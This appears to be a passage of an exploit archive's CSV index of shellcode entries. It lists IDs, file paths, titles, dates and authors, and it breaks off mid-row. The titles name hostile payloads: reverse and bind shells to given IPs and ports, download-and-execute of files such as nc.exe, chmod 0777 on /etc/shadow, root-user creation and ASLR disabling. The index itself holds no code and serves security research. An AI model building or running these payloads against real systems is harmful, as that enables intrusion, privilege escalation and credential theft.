+13670,shellcodes/lin_x86-64/13670.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2)",2010-04-14,Magnefikko,shellcode,lin_x86-64 +13671,shellcodes/lin_x86/13671.c,"Linux/x86 - DoS Badger Game Shellcode (6 bytes)",2010-04-14,Magnefikko,shellcode,lin_x86 +13673,shellcodes/lin_x86/13673.c,"Linux/x86 - DoS SLoc Shellcode (55 bytes)",2010-04-14,Magnefikko,shellcode,lin_x86 +13675,shellcodes/lin_x86/13675.c,"Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,shellcode,lin_x86 +13676,shellcodes/lin_x86/13676.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes)",2010-04-18,sm0k,shellcode,lin_x86 +13677,shellcodes/lin_x86/13677.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes)",2010-04-19,Magnefikko,shellcode,lin_x86 +13679,shellcodes/generator/13679.py,"Linux - write() + exit(0) Shellcode (Generator)",2010-04-20,Stoke,shellcode,generator +13680,shellcodes/lin_x86/13680.c,"Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",shellcode,lin_x86 +13681,shellcodes/lin_x86/13681.c,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (2)",2010-04-21,"Jonathan Salwan",shellcode,lin_x86 +13682,shellcodes/lin_x86/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes)",2010-04-22,Magnefikko,shellcode,lin_x86 +13688,shellcodes/lin_x86-64/13688.c,"Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)",2010-04-25,zbt,shellcode,lin_x86-64 +13691,shellcodes/lin_x86-64/13691.c,"Linux/x86-64 - execve /bin/sh Shellcode (30 bytes)",2010-04-25,zbt,shellcode,lin_x86-64 +13692,shellcodes/lin_x86/13692.c,"Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes)",2010-04-25,condis,shellcode,lin_x86 +13697,shellcodes/lin_x86/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",shellcode,lin_x86 +13698,shellcodes/lin_x86/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",shellcode,lin_x86 +13699,shellcodes/win_x86/13699.txt,"Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode",2010-05-10,Crack_MaN,shellcode,win_x86 +13702,shellcodes/lin_x86/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_); Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",shellcode,lin_x86 +13703,shellcodes/lin_x86/13703.txt,"Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,lin_x86 +13704,shellcodes/solaris_x86/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86 +13707,shellcodes/solaris_x86/13707.c,"Solaris/x86 - Halt Shellcode (36 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86 +13709,shellcodes/solaris_x86/13709.c,"Solaris/x86 - Reboot() Shellcode (37 bytes)",2010-05-21,"Jonathan Salwan",shellcode,solaris_x86 +13711,shellcodes/solaris_x86/13711.c,"Solaris/x86 - Download File (http://shell-storm.org/exemple-solaris) Shellcode (79 bytes)",2010-05-25,"Jonathan Salwan",shellcode,solaris_x86 +13712,shellcodes/lin_x86/13712.c,"Linux/x86 - Disable ASLR Security Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",shellcode,lin_x86 +13715,shellcodes/lin_x86/13715.c,"Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,shellcode,lin_x86 +13716,shellcodes/lin_x86/13716.c,"Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,shellcode,lin_x86 +13719,shellcodes/win_x86-64/13719.txt,"Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,win_x86-64 +13722,shellcodes/lin_x86/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,shellcode,lin_x86 +13723,shellcodes/lin_x86/13723.c,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,lin_x86 +13724,shellcodes/lin_x86/13724.c,"Linux/x86 - Kill All Running Process Shellcode (11 bytes)",2010-05-31,gunslinger_,shellcode,lin_x86 +13725,shellcodes/lin_x86/13725.txt,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,lin_x86 +13726,shellcodes/lin_x86/13726.txt,"Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,lin_x86 +13728,shellcodes/lin_x86/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,lin_x86 +13729,shellcodes/win_x86-64/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,shellcode,win_x86-64 +13730,shellcodes/lin_x86/13730.c,"Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)",2010-06-02,gunslinger_,shellcode,lin_x86 +13731,shellcodes/lin_x86/13731.c,"Linux/x86 - Hard Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,shellcode,lin_x86 +13732,shellcodes/lin_x86/13732.c,"Linux/x86 - Hard Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,shellcode,lin_x86 +13733,shellcodes/solaris/13733.c,"Solaris/x86 - SystemV killall Command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",shellcode,solaris +13742,shellcodes/lin_x86/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,shellcode,lin_x86 +13743,shellcodes/lin_x86/13743.c,"Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,shellcode,lin_x86 +14334,shellcodes/lin_x86/14334.c,"Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)",2010-07-11,blake,shellcode,lin_x86 +13828,shellcodes/windows/13828.c,"Windows - MessageBoxA Shellcode (238 bytes)",2010-06-11,RubberDuck,shellcode,windows +13875,shellcodes/solaris_x86/13875.c,"Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",shellcode,solaris_x86 +13908,shellcodes/lin_x86-64/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",shellcode,lin_x86-64 +13910,shellcodes/lin_x86/13910.c,"Linux/x86 - Bind TCP Shell (31337/TCP) + setreuid(0_0) Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,lin_x86 +13915,shellcodes/lin_x86-64/13915.txt,"Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,lin_x86-64 +13943,shellcodes/lin_x86-64/13943.c,"Linux/x86-64 - Add Root User (shell-storm/leet) Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,lin_x86-64 +14014,shellcodes/win_x86/14014.pl,"Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,shellcode,win_x86 +14116,shellcodes/arm/14116.txt,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm +14052,shellcodes/windows/14052.c,"Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes)",2010-06-25,RubberDuck,shellcode,windows +14097,shellcodes/arm/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",shellcode,arm +14119,shellcodes/lin_x86/14119.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (116 bytes)",2010-06-29,gunslinger_,shellcode,lin_x86 +14142,shellcodes/arm/14142.c,"Linux/ARM - chmod 0777 /etc/shadow Polymorphic Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",shellcode,arm +14122,shellcodes/arm/14122.txt,"Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",shellcode,arm +14139,shellcodes/arm/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",shellcode,arm +14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL); XOR 88 Encoded Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm +14216,shellcodes/lin_x86/14216.c,"Linux/x86 - Bind TCP /bin/sh Shell (64533/TCP) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,lin_x86 +14218,shellcodes/linux/14218.c,"Linux - Write SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,shellcode,linux +14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,shellcode,linux +14221,shellcodes/windows/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode",2010-07-05,"Alexey Sintsov",shellcode,windows +14234,shellcodes/linux/14234.c,"Linux - Bind TCP Shell (6778/TCP) XOR Encoded Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux +14235,shellcodes/linux/14235.c,"Linux - Bind Netcat Shell (31337/TCP) Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux +14261,shellcodes/generator/14261.c,"ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator +14276,shellcodes/linux/14276.c,"Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux +14288,shellcodes/win_x86/14288.asm,"Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,win_x86 +14305,shellcodes/lin_x86-64/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,lin_x86-64 +14332,shellcodes/lin_x86/14332.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes)",2010-07-11,blake,shellcode,lin_x86 +14691,shellcodes/lin_x86/14691.c,"Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,lin_x86 +14697,shellcodes/windows/14697.c,"Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows +14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind TCP Shell (2525/TCP) Shellcode (167 bytes)",2010-08-25,beosroot,shellcode,bsd_x86 +14873,shellcodes/win_x86/14873.asm,"Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-02,dijital1,shellcode,win_x86 +14907,shellcodes/arm/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",shellcode,arm +15063,shellcodes/win_x86/15063.c,"Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,shellcode,win_x86 +15116,shellcodes/windows/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",shellcode,windows +15136,shellcodes/windows/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",shellcode,windows +15202,shellcodes/win_x86/15202.c,"Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",shellcode,win_x86 +15203,shellcodes/win_x86/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,win_x86 +15314,shellcodes/arm/15314.asm,"ARM - Bind TCP Shell (0x1337/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm +15315,shellcodes/arm/15315.asm,"ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm +15316,shellcodes/arm/15316.asm,"ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm +15317,shellcodes/arm/15317.asm,"ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm +15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm +15618,shellcodes/osx/15618.c,"OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx +15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator +15879,shellcodes/win_x86/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,shellcode,win_x86 +16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator +16026,shellcodes/bsd_x86/16026.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,bsd_x86 +16283,shellcodes/win_x86/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,win_x86 +17432,shellcodes/sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,sh4 +17194,shellcodes/lin_x86/17194.txt,"Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,lin_x86 +17224,shellcodes/osx/17224.s,"OSX/Intel x86-64 - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx +17323,shellcodes/windows/17323.c,"Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows +20195,shellcodes/lin_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,lin_x86 +17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator +17371,shellcodes/lin_x86/17371.txt,"Linux/x86 - Reverse TCP SSL Shell (localhost:8080/TCP) Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,lin_x86 +17439,shellcodes/sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,sh4 +17545,shellcodes/win_x86/17545.txt,"Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,win_x86 +17559,shellcodes/lin_x86/17559.c,"Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,lin_x86 +17564,shellcodes/osx/17564.asm,"OSX - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx +17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve /bin/sh Shellcode (52 bytes)",2011-10-07,entropy,shellcode,linux_mips +17996,shellcodes/generator/17996.c,"Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)",2011-10-18,entropy,shellcode,generator +18154,shellcodes/sh4/18154.c,"Linux/SuperH (sh4) - setuid(0); + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",shellcode,sh4 +18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,shellcode,linux_mips +18163,shellcodes/linux_mips/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes)",2011-11-27,rigan,shellcode,linux_mips +18197,shellcodes/lin_x86-64/18197.c,"Linux/x86-64 - execve /bin/sh Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,lin_x86-64 +18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse TCP Shell (0x7a69/TCP) Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips +18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,shellcode,linux_mips +18294,shellcodes/lin_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,lin_x86 +18379,shellcodes/lin_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,shellcode,lin_x86 +18585,shellcodes/lin_x86-64/18585.s,"Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,shellcode,lin_x86-64 +18885,shellcodes/lin_x86/18885.c,"Linux/x86 - execve /bin/dash Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,lin_x86 +20196,shellcodes/lin_x86/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,lin_x86 +21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm +21253,shellcodes/arm/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,shellcode,arm +21254,shellcodes/arm/21254.asm,"Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)",2012-09-11,midnitesnake,shellcode,arm +40363,shellcodes/win_x86/40363.c,"Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shell Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,win_x86 +22489,shellcodes/windows/22489.cpp,"Windows XP Professional SP3 - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)",2012-11-05,b33f,shellcode,windows +40890,shellcodes/win_x86-64/40890.c,"Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,win_x86-64 +23622,shellcodes/lin_x86/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",shellcode,lin_x86 +24318,shellcodes/windows/24318.c,"Windows - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows +25497,shellcodes/lin_x86/25497.c,"Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,lin_x86 +40387,shellcodes/hardware/40387.nasm,"Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",shellcode,hardware +27132,shellcodes/hardware/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",shellcode,hardware +27180,shellcodes/arm/27180.asm,"Windows RT ARM - Bind TCP Shell (4444/TCP) Shellcode",2013-07-28,"Matthew Graeber",shellcode,arm +40827,shellcodes/lin_x86/40827.c,"Linux/x86 - Egghunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",shellcode,lin_x86 +28474,shellcodes/lin_x86/28474.c,"Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP /bin/sh Shell (192.168.122.1:43981/TCP) Shellcode",2013-09-23,"Ryan Fenno",shellcode,lin_x86 +40334,shellcodes/win_x86/40334.c,"Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 Bytes)",2016-09-05,"Roziul Hasan Khan Shifat",shellcode,win_x86 +28996,shellcodes/windows/28996.c,"Windows - MessageBox Null-Free Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",shellcode,windows +29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips +40352,shellcodes/win_x86/40352.c,"Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 Bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,win_x86 +33836,shellcodes/windows/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows +34060,shellcodes/lin_x86/34060.c,"Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,lin_x86 +34262,shellcodes/lin_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,lin_x86 +34592,shellcodes/lin_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,lin_x86 +34667,shellcodes/lin_x86-64/34667.c,"Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,lin_x86-64 +34778,shellcodes/lin_x86/34778.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",shellcode,lin_x86 +35205,shellcodes/lin_x86-64/35205.txt,"Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL); Position Independent Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,lin_x86-64 +35519,shellcodes/lin_x86/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,shellcode,lin_x86 +35586,shellcodes/lin_x86-64/35586.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,lin_x86-64 +35587,shellcodes/lin_x86-64/35587.c,"Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,lin_x86-64 +35793,shellcodes/win_x86/35793.txt,"Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,win_x86 +35794,shellcodes/win_x86-64/35794.txt,"Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,win_x86-64 +35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve /bin/sh Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips +36411,shellcodes/generator/36411.txt,"Windows XP x86-64 - Download File + Execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator +36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips +36276,shellcodes/linux_mips/36276.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips +36359,shellcodes/lin_x86-64/36359.c,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",shellcode,lin_x86-64 +36391,shellcodes/lin_x86/36391.c,"Linux/x86 - execve /bin/sh ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,lin_x86 +36393,shellcodes/lin_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,lin_x86 +36394,shellcodes/lin_x86/36394.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,lin_x86 +36395,shellcodes/lin_x86/36395.c,"Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,lin_x86 +36397,shellcodes/lin_x86/36397.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333/TCP) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,lin_x86 +36398,shellcodes/lin_x86/36398.c,"Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,lin_x86 +36637,shellcodes/lin_x86/36637.c,"Linux/x86 - Disable ASLR Security Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",shellcode,lin_x86 +36672,shellcodes/lin_x86/36672.asm,"Linux/x86 - Egghunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",shellcode,lin_x86 +36673,shellcodes/generator/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",shellcode,generator +36701,shellcodes/lin_x86/36701.c,"Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",shellcode,lin_x86 +36750,shellcodes/lin_x86/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",shellcode,lin_x86 +36778,shellcodes/lin_x86/36778.c,"Linux/x86 - execve /bin/sh Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",shellcode,lin_x86 +36779,shellcodes/win_x86/36779.c,"Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,win_x86 +36780,shellcodes/win_x86/36780.c,"Windows XP SP3 x86 - Restart Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,win_x86 +36781,shellcodes/generator/36781.py,"Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator +36857,shellcodes/lin_x86/36857.c,"Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,lin_x86 +36858,shellcodes/lin_x86-64/36858.c,"Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,lin_x86-64 +36921,shellcodes/lin_x86/36921.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,lin_x86 +36908,shellcodes/lin_x86/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",shellcode,lin_x86 +37069,shellcodes/lin_x86/37069.c,"Linux/x86 - execve /bin/sh Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",shellcode,lin_x86 +37251,shellcodes/lin_x86/37251.asm,"Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1)",2015-06-10,B3mB4m,shellcode,lin_x86 +37285,shellcodes/lin_x86/37285.txt,"Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 